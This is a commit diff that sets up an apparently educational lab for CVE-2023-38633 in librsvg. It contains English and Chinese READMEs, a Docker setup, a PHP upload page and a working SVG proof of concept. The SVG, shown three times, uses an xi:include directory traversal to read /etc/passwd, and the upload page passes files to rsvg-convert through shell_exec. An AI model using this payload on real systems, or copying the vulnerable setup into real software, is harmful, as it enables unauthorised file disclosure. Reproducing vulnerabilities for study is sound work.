first commit

librsvg/CVE-2023-38633/README.md

@@ -0,0 +1,42 @@
+# Librsvg XInclude Arbitrary file reading (CVE-2023-38633)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Librsvg is a free software SVG rendering library written as part of the GNOME project, intended to be lightweight and portable.
+
+A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used by local or remote attackers to disclose files (on the local filesystem outside of the expected area), as demonstrated by `href=".?../../../../../../../../../../etc/passwd` in an xi:include element.
+
+References:
+
+- <https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/>
+- <https://gitlab.gnome.org/GNOME/librsvg/-/issues/996>
+
+## Vulnerable Environment
+
+Executing following command to start a PHP server that uses librsvg 2.50.7 to handle SVG images:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8080` to see the upload page.
+
+## Exploit
+
+Use `<xi:include>` to read the local file by this POC:
+
+```xml
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
+  <rect width="300" height="300" style="fill:rgb(255,255,255);" />
+  <text x="10" y="100">
+    <xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
+      <xi:fallback>file not found</xi:fallback>
+    </xi:include>
+  </text>
+</svg>
+```
+
+Upload this SVG image to server, you will see the `/etc/passwd` that is embedded in the output image:
+
+![](1.png)

librsvg/CVE-2023-38633/README.zh-cn.md

@@ -0,0 +1,40 @@
+# librsvg XInclude 文件包含漏洞（CVE-2023-38633）
+
+librsvg是一个用于处理SVG图片的开源依赖库。
+
+librsvg支持XML中的XInclude规范，可以用于加载外部内容。在librsvg 2.56.3版本以前，由于处理路径存在逻辑错误，导致攻击者可以传入一个恶意构造的SVG图片，进而读取到任意文件。
+
+参考链接：
+
+- <https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/>
+- <https://gitlab.gnome.org/GNOME/librsvg/-/issues/996>
+
+## 漏洞环境
+
+执行如下命令启动一个PHP服务器，其中使用librsvg 2.50.7将用户上传的SVG图片转换成PNG图片并返回：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看到上传页面。
+
+## 漏洞复现
+
+将路径嵌入到`<xi:include>`标签中，如下POC：
+
+```xml
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
+  <rect width="300" height="300" style="fill:rgb(255,255,255);" />
+  <text x="10" y="100">
+    <xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
+      <xi:fallback>file not found</xi:fallback>
+    </xi:include>
+  </text>
+</svg>
+```
+
+上传这个SVG图片，即可查看到`/etc/passwd`已被成功读取并渲染进PNG图片中：
+
+![](1.png)

librsvg/CVE-2023-38633/docker-compose.yml

@@ -0,0 +1,9 @@
+version: '2'
+services:
+ web:
+   image: vulhub/librsvg:2.50.7-php
+   command: php -t /var/www/html -S 0.0.0.0:8080
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+    - "8080:8080"

librsvg/CVE-2023-38633/index.php

@@ -0,0 +1,28 @@
+<?php
+$newname = '';
+if (!empty($_FILES)) {
+    $ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+    if (!in_array($ext, ['svg'])) {
+        die('Unsupported filetype uploaded.');
+    }
+
+    $newname = uniqid() . '.png';
+    shell_exec("rsvg-convert {$_FILES['file_upload']['tmp_name']} > ./{$newname}");
+}
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<br>
+<?php
+if ($newname):
+?>
+<h1>Your image:</h1>
+<p>
+    <a href="./<?=$newname?>" target="_blank">
+        <img src="./<?=$newname?>">
+    </a>
+</p>
+<?php
+endif;

librsvg/CVE-2023-38633/poc.svg

@@ -0,0 +1,9 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
+  <rect width="300" height="300" style="fill:rgb(255,255,255);" />
+  <text x="10" y="100">
+    <xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
+      <xi:fallback>file not found</xi:fallback>
+    </xi:include>
+  </text>
+</svg>